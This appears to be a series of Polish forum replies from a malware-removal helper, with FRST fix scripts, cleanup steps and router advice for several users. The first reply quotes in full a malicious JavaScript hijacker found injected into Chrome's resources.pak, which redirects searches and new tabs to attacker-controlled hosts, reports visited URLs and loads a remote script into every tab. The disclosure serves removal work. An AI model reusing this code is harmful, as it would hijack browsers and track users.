picasso

To nie wygląda na oryginalny raport AdwCleaner, tylko ponownie zapisany, gdyż przejścia do nowej linii są zniekształcone. Niemniej log nie wskazuje, by narzędzie coś wykryło. Upłynęło dużo czasu, w międzyczasie wydano też nowe wersje Google Chrome. Czy problemy z zamulaniem przeglądarki nadal mają miejsce?

Pro forma komentarz. Tak, problemem była modyfikacja pliku zasobów Google Chrome C:\Program Files\Google\Chrome\Application\[Wersja]\resources.pak. Oto zmodyfikowany frament (dostawiony szkodliwy skrypt): <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://moneyviking-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return [ ".*capacostarica.com.*",".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.yahoo.com.*rh=true.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.yahoo.com.*",".*ask\\.com.*",".*search.searchitknow.com.*",".*ask.com.*siteid=23199.*",".*ask.com.*siteid=23203.*",".*ask.com.*siteid=23209.*",".*ask.com.*siteid=23204.*",".*ask.com.*siteid=23210.*",".*ask.com.*siteid=28524.*",".*ask.com.*siteid=23200.*",".*ask.com.*siteid=28525.*",".*ask.com.*siteid=28531.*",".*ask.com.*siteid=23205.*",".*ask.com.*siteid=28532.*",".*ask.com.*siteid=29358.*",".*ask.com.*siteid=23211.*",".*ask.com.*siteid=28533.*",".*ask.com.*siteid=28526.*",".*ask.com.*siteid=23201.*",".*ask.com.*siteid=23207.*",".*ask.com.*siteid=23212.*",".*ask.com.*siteid=28529.*",".*ask.com.*siteid=29356.*",".*ask.com.*siteid=23202.*",".*ask.com.*siteid=23208.*",".*ask.com.*siteid=23213.*",".*ask.com.*siteid=28530.*",".*smartshopsave.com.*siteid=29357.*",".*bing.com.*IMZ-RZ.*",".*home.searchpile.com.*",".*au.smartshopsave.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*search.yahoo.com.*yhs-invalid.*",".*capn=ed_ui_.*_kw_004.*",".*au.ask.com.*28527.*",".*search.top-arama.com.*",".*search.yahoo.com.*spigot.*",".*search.yahoo.com.*greentree.*",".*smartshopsave.com.*siteid=23203.*",".*smartshopsave.com.*siteid=23199.*",".*smartshopsave.com.*siteid=23204.*",".*smartshopsave.com.*siteid=23209.*",".*smartshopsave.com.*siteid=23210.*",".*smartshopsave.com.*siteid=28524.*",".*smartshopsave.com.*siteid=23200.*",".*smartshopsave.com.*siteid=28525.*",".*smartshopsave.com.*siteid=28531.*",".*smartshopsave.com.*siteid=23205.*",".*smartshopsave.com.*siteid=28532.*",".*smartshopsave.com.*siteid=29358.*",".*smartshopsave.com.*siteid=23211.*",".*smartshopsave.com.*siteid=28533.*",".*smartshopsave.com.*siteid=28526.*",".*smartshopsave.com.*siteid=23201.*",".*smartshopsave.com.*siteid=23207.*",".*smartshopsave.com.*siteid=23212.*",".*smartshopsave.com.*siteid=28529.*",".*smartshopsave.com.*siteid=29356.*",".*smartshopsave.com.*siteid=23202.*",".*smartshopsave.com.*siteid=23208.*",".*smartshopsave.com.*siteid=23213.*",".*smartshopsave.com.*siteid=28530.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://moneyviking-a.akamaihd.net/MoneyViking/cr?t=BLGC&g=64f71bdb-fbe8-49a9-98bf-c99c836b7c85&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"},{host:"isearch.omiga-plus.",param:"q",oparam:"NA"},{host:"searches.omiga-plus.",param:"q",oparam:"NA"},{host:"istart.webssearches.",param:"q",oparam:"NA"},{host:"search.istartsurf.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVdF8PUFsVQxhFIlwATA1IQAwOeQFaBxQSGAxAeAoOAw4SGQAFIk0FA1oDB0VXfVtUBlpXTwhuL1ddGG8YSlxNJw=="});k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. Rozwiązaniem byłaby albo podmiana tego pliku starszą kopią (był w folderze niezmodyfikowany plik resources.bak), albo reinstalacja przeglądarki nadpisująca zawartość katalogu Program files. To drugie już wykonałeś. Natomiast jeśli chodzi o inne zagadnienia widoczne w raportach: 1. Odinstaluj: Anvi Smart Defender 2.5 (słaby program), Java 7 Update 65 (stara wersja), McAfee Security Scan Plus (sponsor instalacji Adobe Flash), Update for PriceFountain (adware). 2. Drobny skrypt usuwający odpadkowe wpisy. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: C:\WINDOWS\Tasks\At1.job => C:\DOCUME~1\Brim\DANEAP~1\PRICEF~1\UPDATE~1\UPDATE~1.EXE SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, mcenspc.dll Toolbar: HKU\S-1-5-21-4124746199-4171654727-105604383-1006 -> Brak nazwy - {A13C2648-91D4-4BF3-BC6D-0079707C4389} - Brak pliku HKU\S-1-5-21-4124746199-4171654727-105604383-1006\...\Run: [Polar Sync] => [X] HKLM\...\Policies\Explorer: [NoCDBurning] 0 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KernelFaultCheck DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes RemoveDirectory: C:\Program Files\Winsere RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Uruchomiłeś ponownie stary Fixlog z poprzedniej rundy, a nie nowy. Zapisz ponownie plik z danymi z mojego ostatniego posta i wykonaj. I skoro były zmiany w oprogramowaniu, to na wszelki wypadek zrób nowe raporty FRST (FRST.txt + Addition.txt). PS. Dziś znalazłam drugi temat i go tu dokleiłam. Czy poniższy problem nadal aktualny?

Wielkie dzięki za dotację. Temat rozwiązany. Zamykam.

O ile problem nadal aktualny, rozpocznij od poprawnej deinstalacji adware/PUP, doczyszczanie zostanie przeprowadzone w drugim etapie: 1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj: do-search uninstall, McAfee Security Scan Plus, mystartsearch, qksee, REACHit, Strong Signal, WarThunder, WinZip (to fałszywa kopia a nie WinZip marki Corel). Jeśli któraś pozycja będzie niewidoczna lub zwróci błąd deinstalacji, kontynuuj. 2. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pola Addition i Shortcut, by powstały trzy logi.

O ile problem nadal aktualny: Na dysku widać pliki "Asystenta pobierania" dobrychprogramów, a nie instalatory właściwe. Czym grozi pobieranie z tego serwisu: KLIK. Prawdopodobnie PriceFountain zostało właśnie nabyte z "Asystenta" dobrychprogramów. 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {4DA9E859-EB4F-4B12-B0A0-75903EAA81FC} - System32\Tasks\wwwFrenzyingReluctantlyV2 => Rundll32.exe ProcuringCooperators.dll,main 7 1 CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia CHR HKLM\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [ljibkigjccbegnbeojkoafejpoiachej] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1093597737-154638444-1121763440-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1093597737-154638444-1121763440-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - iexplore.exe HKLM-x32\...\Run: [] => [X] HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> FirewallRules: [{193E347A-284F-4458-9324-04C3019D4CAF}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe FirewallRules: [{9A947D63-73A4-4D79-91B3-E1E1096D155A}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GlassWire DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GoogleChromeAutoLaunch_27DB4C2F86F0ABF2C4415F947F94FFA3 RemoveDirectory: C:\ProgramData\GlassWire RemoveDirectory: C:\Users\www\AppData\Local\FrenzyingReluctantly RemoveDirectory: C:\Users\www\AppData\Local\GlassWire C:\Users\Public\Desktop\My Software Deals.url C:\Users\www\AppData\Roaming\Setup32217.exe C:\Users\www\Downloads\*-dp* EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj BestY NewTab, o ile nadal będzie widoczny po w/w operacji. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Fix wykonany. Znajome końcowe czynności, czyli DelFix i czyszczenie folderów Przywracania systemu: KLIK. Temat zamykam.

Czyszczenie lokalizacji tymczasowych już tu było prowadzone (komenda EmptyTemp: w skrypcie FRST). Windows ma zainstalowany SP1 i IE11. W pierwszym raporcie Addition była owszem ciut starsza wersja Adobe Reader i Java, ale to stan sprzed miesiąca - jeśli nadal są te same wersje, to oczywiście możesz je zaktualizować. DelFix przeprowadził operacje. Skasuj z dysku plik C:\delfix.txt. Temat rozwiązany. Zamykam.

DelFix wykonał co należy. Skasuj z dysku plik C:\delfix.txt. Temat infekcji rozwiązany. Zamykam. Gdyby coś się działo, poproś na PW o otworzenie.

Jaki plik / skąd pobierany? Czy pliki z innych serwerów też pobierają się bardzo powoli? "Połączenia IPv6: Brak dostępu do sieci" to standardowy odczyt, jeśli jest używane IPv4 dla danego połączenia. U mnie jest taki sam stan i nie ma to żadnego wpływu na szybkość pobierania danych.

Czy nadal występuje u Ciebie tytułowy komunikat? Natomiast Fix FRST w większości pomyślnie wykonany. Jeden wpis adware w Google Chrome nie został przetworzony. Pod tym kątem: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Wygląd i zaznacz "Pokaż przycisk strony startowej" > klik w Zmień i usuń adres trovi.com.

DelFix zgłupiał nieco i skasował jeden plik omyłkowo, czyli ten skrót z Pulpitu: Shortcut: G:\Documents and Settings\All Users\Pulpit\MKV File Player.lnk -> G:\Program Files\MKV File Player\MKVFilePlayer.exe () Ale szkody żadne, po prostu skrót ręcznie odtworzysz. Skasuj z dysku plik raportu G:\delfix.txt. To wszystko.

Tematy łączę razem. Tcpip\Parameters: [DhcpNameServer] 91.205.74.25 8.8.8.8 Tcpip\..\Interfaces\{1382FDDA-8333-4C5C-991C-992485EDAF2F}: [DhcpNameServer] 91.205.74.25 8.8.8.8 Niewiele już chyba mogę tu poradzić, skoro aktualizacja firmware i konfiguracja wg wytycznych są mało skuteczne. Jako ostatni krok zresetuj router do ustawień fabrycznych posługując się przyciskiem na obudowie. Po resecie wejdź do konfiguracji i zmień hasło na inne niż poprzednio używane, upewnij się też że dostęp od strony internetu jest zamknięty. Jeśli pomimo tych działań nadal router będzie przejmowany przez infekcję, zostaje bezpośredni kontakt z producentem sprzętu i/lub wymiana routera na bezpieczniejszy model.

Potwierdzam wykonanie zadań. 1. Przez SHIFT+DEL (omija Kosz) skasuj z dysku foldery C:\MATS + F:\Pobrane\FRST. 2. Następnie uruchom DelFix, na koniec zaś wyczyść foldery Przywracania systemu: KLIK. Temat rozwiązany. Zamykam.

Zrobione. Kończymy: Skorzystaj z narzędzia DelFix, a następnie wyczyść foldery Przywracania systemu: KLIK. Tam też linkowane najnowsze wersje produktów Adobe.

Wszystko pomyślnie przetworzone i w raportach nie widać już żadnych oznak infekcji adware. Na wszelki wypadek jeszcze: 1. W Google Chrome: Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > czy usunąłeś tę trefną wyszukiwarkę search.so-v.com? 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Teraz dopiero zauważyłam. Ostatni błąd jest wynikiem tego, że komenda pracowała na nieistniejącym folderze. Te komendy są robione na złym dysku, czyli C - foldery FOUND są na G. Czyli do wpisania: icacls G:\found.000/grantKorvin:F/T icacls G:\found.001/grantKorvin:F/T

Proszę nie podpinać się pod cudze wątki i nie mnożyć takich samych postów. Wydzielone w osobny temat, a duplikat usunięty. O ile problem nadal aktualny: Błąd jest omówiony w tym artykule: KLIK.

Skoro wysyłasz link, to jest odpowiedź dlaczego pojawia się ten komunikat. Wg opisu ten mechanizm może generować też fałszywe alarmy i pojawiać się dla bezpiecznych URL.

KarolK30 błędnie wpisujesz komendy, niekompletny cudzysłów plus brakuje spacji między ścieżką dostępu a parametrem /grant: icacls c:\found.000/grantKorvin:F/T

Mechanizm captcha jest generowany przez Facebooka: KLIK. Podczas jakich akcji on się pojawia, tzn. czy wysyłasz jakąś konkretną treść z linkiem URL? Ostatni Fix FRST pomyślnie wykonany. Na koniec poczęstuj się DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Gładko poszło. Na zakończenie skorzystaj z DelFix oraz wyczyść fokdery Przywracania systemu: KLIK. Dosłownie tak jak je widać, przeglądam linia po linii. Nie ma żadnych automatów analitycznych. Zdolność analizy raportu FRST jest bezpośrednią konsekwencją dobrej znajomości budowy Windows i przeglądarek. Notabene, detekcja polityk Google Chrome została opracowana przeze mnie, autor ją po prostu dodał do FRST na podstawie mojego opisu.

Problemem są polityki Google Chrome wstawione przez adware. Do wykonania następujące operacje: 1. Odinstaluj odpadek Mozilla Maintenance Service - Firefox został tu już odinstalowany i nie ma innych produktów Mozilla. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia Task: {12E9F500-8F6B-483A-8EB0-E8B0B55F594F} - System32\Tasks\{AD2A12DB-3CD1-43D4-9987-2EAEB8DDE134} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.60.104/pl/eula Task: {22B61B35-36AD-459D-AA5E-7E759DBCAA11} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {34AD9860-A13F-4A26-8F13-A99840A12B08} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {35F8E795-7347-4F29-B2C5-5A8B3C80DCFA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {36983EC0-2ACA-4052-8B57-92FA677966A8} - System32\Tasks\{5BC5E37A-3939-4946-A15C-214BC380304C} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.60.104/pl/eula Task: {6B1AC271-78E3-4137-B731-E7AAC803AC85} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {6DB57ECE-3A1C-4960-8929-66F9CDC8B620} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {7D74D90E-4C8D-4EAA-A5C6-5BF31FA33E7F} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {839C6A78-5903-4400-B8B4-BBC4A2EFFD29} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {94BE8339-1DE7-42EE-BCF4-1877582A4A6D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {A1A927BE-C3C4-4134-94A1-824797F1C3FA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {BA9B0CD2-A55F-4ACF-9E9D-9F5BA33E6B03} - System32\Tasks\{FDB07207-3538-4E6D-B26A-6FF1FEC58F97} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.60.104/pl/eula Task: {E31112F3-C41C-44A7-B9F3-0FC80D1F84AB} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {F7A79902-355C-48F6-8528-16FDF82E14CB} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku HKLM-x32\...\Run: [LManager] => [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-1359127692-1463339172-2411425835-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie HKU\S-1-5-21-1359127692-1463339172-2411425835-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie SearchScopes: HKU\S-1-5-21-1359127692-1463339172-2411425835-1002 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear StartMenuInternet: IEXPLORE.EXE - iexplore.exe DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Franciszek\Downloads\*.crdownload C:\Users\Franciszek\AppData\Roaming\ClassicShell\Pinned\startscreen.lnk C:\Users\Franciszek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\start_menu_selector_windows_8_by_mbossg-d4a8i99.lnk C:\Users\Franciszek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Windows 8 Menu.lnk C:\Users\Franciszek\Pictures\Meble\Schlossburg*.lnk RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Users\Franciszek\AppData\Local\Mozilla RemoveDirectory: C:\Users\Franciszek\AppData\Roaming\Mozilla EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy to fałszywe Google, o ile nadal będzie się wyświetlać. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

